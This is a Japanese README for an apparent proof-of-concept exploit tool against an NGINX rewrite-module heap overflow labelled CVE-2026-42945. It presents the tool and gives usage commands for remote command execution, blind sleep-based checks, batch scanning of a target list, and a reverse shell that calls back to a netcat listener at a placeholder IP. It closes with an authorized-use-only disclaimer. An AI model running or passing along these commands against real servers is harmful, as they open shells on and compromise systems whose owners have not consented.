
CVE-2026-42945(NGINX Rift)の概念実証エクスプロイト。マルチモードRCE、ブラインド検証、リバースシェル、認可されたセキュリティ研究のためのバッチスキャン機能を備えています。
NGINX Rift 脆弱性を調査・特定するためのプロフェッショナルな Proof-of-Concept(PoC)ツールです。これは ngx_http_rewrite_module における深刻なヒープベースのバッファオーバーフローです。
? を含む置換文字列を使用した場合に、2 パス方式のリライトエンジンでサイズ不一致エラーが発生します。python3 poc.py --url http://target.com --method id
targets.txt という名前のファイルを作成し、1 行に 1 つの URL を記述します:
http://1.2.3.4
https://docs.company.com
http://server.internal:8080
次に以下を実行します:
python3 poc.py --list targets.txt --method sleep
python3 poc.py --url http://target.com --cmd "whoami" --verbose
最初にリスナーを起動してください: nc -lvp 1337
python3 poc.py --url http://target.com --method shell --listen-ip [YOUR_IP] --listen-port 1337
このツールは教育目的および許可を得たセキュリティ監査専用です。作者は、このスクリプトの誤用またはそれによって生じた損害について一切責任を負いません。いかなるインフラストラクチャに対してテストを行う前に、必ず明示的な許可を取得してください。